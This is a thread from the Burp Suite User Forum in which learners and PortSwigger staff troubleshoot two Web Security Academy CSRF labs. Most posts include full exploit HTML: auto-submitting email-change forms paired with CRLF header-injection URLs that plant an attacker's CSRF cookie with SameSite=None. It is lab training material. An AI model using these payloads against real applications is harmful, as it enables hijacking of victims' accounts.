The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab #5: CSRF where token is tied to non-session cookie & Lab #6: CSRF where token is duplicated in cookie issues

LeeSu | Last updated: Oct 11, 2022 05:28PM UTC

Hello, I have been working on the CSRF Labs and I'm having problem with the following labs: - Lab #5: CSRF where token is tied to non-session cookie - Lab #6: CSRF where token is duplicated in cookie issues For Lab #5, below is what I have tried. 1. Obtained the attacker's (carlos) CSRF key from the cookie header. 2. Obtained the attacker's (carlos) CSRF token from the input parameter. 3. Crafted an HTML page that does the followings: - Inject the attacker's CSRF key into the victim's (wiener) browser cookie using the HTTP Header Injection method. - Submit the email change request with the attacker's CSRF token as the "csrf" parameter value. And below is the HTML code I made: <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.getElementById('csrf-form').submit()"> </body> </html> I have also tried this: <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.forms[0].submit()"> </body> </html> And upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instruction but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how it can be as I have checked that I am using a fresh CSRF token and key from the attacker (carlos). For Lab #6, below is what I have tried. <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned1@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> </form> <img src="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" onerror="document.getElementById('csrf-form').submit()"> </body> </html> This also doesn't work using the exploit server, but it works when using Burp Repeater. I also have checked that the csrf token gets successfully injected into the cookie header with this input "TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" on the search function using Burp Repeater. Can you spot what is issue on my exploits? Thank you!

Michelle, PortSwigger Agent | Last updated: Oct 12, 2022 09:18AM UTC

Thanks for your message. There has been a recent change to the exploit server, so the $cookie-injection-url needs to include SameSite=None for these two labs, for example: https://<your-lab-id>/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None We'll be updating the solutions soon.

LeeSu | Last updated: Oct 17, 2022 05:54PM UTC

Thank you for the reply, I was able to solve the labs following your instruction. Much appreciated.

BirD | Last updated: Mar 18, 2024 09:18AM UTC

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried. <html> <body> <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Michelle, PortSwigger Agent | Last updated: Mar 18, 2024 01:29PM UTC

Hi When testing this on yourself, did you have the csrf token in the form set to your CSRF token and the csrfkey in the img src link set to fake? When you then deliver this to the victim, did you set both values to fake?

Mario | Last updated: Jun 13, 2024 09:35PM UTC

Hello, I have encountered an issue with the CSRF lab where the token is tied to a non-session cookie. I followed all the steps, but I am unsure if the problem lies with the browser (Burp's Chromium). I have two users, Wiener and Carlos. From Wiener, I obtain the two CSRF tokens. I then place them in the exploit server: <form method="POST" action="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="unmail777@mail.com"> <input type="hidden" name="csrf" value="ktw3B3EXEwad9rgv4TlvZrQZ9gONdepf"> </form> <img src="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=fGryYqHpou8b36uI8SkXKqCDCuQIxXGb%3b%20SameSite=None" onerror="document.forms[0].submit()"> After setting this up, I click on "store", copy the exploit link, and paste it into the browser where I have the user Carlos (my victim) logged in. Sometimes I open a new tab, and sometimes I stay in the same tab where I intend to change the email. When I submit the request, I get an invalid CSRF token error. I intercepted the request to see what was happening. The search is successful and sets the token, but when the POST request to change the email is made, the CSRFKey is still associated with Carlos' session instead of Wiener's. Is this issue related to the browser?

Hannah, PortSwigger Agent | Last updated: Jun 17, 2024 10:39AM UTC

I've tested this lab and can confirm that it is working as expected. Have you tried encoding any special characters to see if that makes a difference? For example, for your email value, use something like "asdf&#64;asdf&#46;asdf". Please also ensure that the email address you use in your exploit is unique and has not already been used in the lab. Additionally, you may want to verify that your CSRF token is up-to-date, so you could try refreshing your original session and verifying that the CSRF token is still the same.

david | Last updated: Jul 02, 2024 08:26AM UTC

BirD exploit is working but i cant understand why(when viewed exploit it shows"invalid token" but when delivered to victim the lab is solved I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried. <html> <body> <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Carson | Last updated: Jul 10, 2024 09:16PM UTC

The issue from Lab 5 still exists, Ive followed many guides and it always gives Invalid CSRF token no matter how new it is, unused, have SameSite=None, encoded various symbols. I think internally lab might be broken.

Carson | Last updated: Jul 10, 2024 09:17PM UTC

Works when I try in browser then when I enter new CSRF token to send to victim it says Invalid CSRF. Accepts it from own browser each time.

Carson | Last updated: Jul 10, 2024 09:20PM UTC

Issue fixed after trying again with new CSRF token/cookie from Carlos, I did try this step prior but it didn't work, I do think lab can be a bit hard to work with.

Carlos | Last updated: Aug 31, 2024 07:50AM UTC

Hi guys, When I tried to deliver the exploit to the victim It doesnt work: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0ad3001e0446f5068044c1d400e70006.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="exploit2&#64;exploit&#46;es" /> <input type="hidden" name="csrf" value="v0YbX3UYXZZsGIZKxlefoU2hIpjx9S9Y" /> <input type="submit" value="Submit request" /> </form> <img src="https://0ad3001e0446f5068044c1d400e70006.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=kqh3URu7iKmUIwcW6bzpntaRa0qasdGN%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html> ``` But If I tried with the function "View Exploit" works. Why?

Michelle, PortSwigger Agent | Last updated: Sep 02, 2024 08:20AM UTC

Hi Can you confirm which of the CSRF labs you are woking on, please? Is it 'CSRF where token is tied to non-session cookie' or 'CSRF where token is duplicated in cookie'?

kd4sh | Last updated: Sep 12, 2024 05:22PM UTC

Hi, LAB: CSRF where token is tied to non-session cookie I generated a PoC with Burp from the changing email request in the wiener's account(victim), I logged in in a separate browser in the carlos' account, got the CSRF token and csrfKey, put the token in the form's input and the csrfKey in the <img src's value. When I test it with view exploit, it works, when I deliver it, it doesn't. I lost a couple of hours on this which should be done in ~10 minutes. Please find below my solution: Solution: <html> <body> <form action="https://0a310074047128768015ad38009d005e.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="testemail&#64;email&#46;com" /> <input type="hidden" name="csrf" value="2WkWdCOfhOXllyzK6UKx24cMW0ONq9YD" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a310074047128768015ad38009d005e.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrfKey=epgU0dIsOMzob7Yoo4xxSFqMPwsB46sO%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html> I also tried different variations written by myself that should have work.

Michelle, PortSwigger Agent | Last updated: Sep 13, 2024 07:55AM UTC

Hi After testing it with 'View exploit' did you then change the email address used in your solution before delivering it to the victim?

kd4sh | Last updated: Sep 13, 2024 08:42AM UTC

Hi, Yes, I did not forget about that.

Michelle, PortSwigger Agent | Last updated: Sep 13, 2024 10:50AM UTC

I've just tested using the solution you posted above (changing the lab ID and CSRF details) and after clicking 'Deliver exploit to victim', the lab showed as solved. Can you give this another try?

kd4sh | Last updated: Sep 13, 2024 11:30AM UTC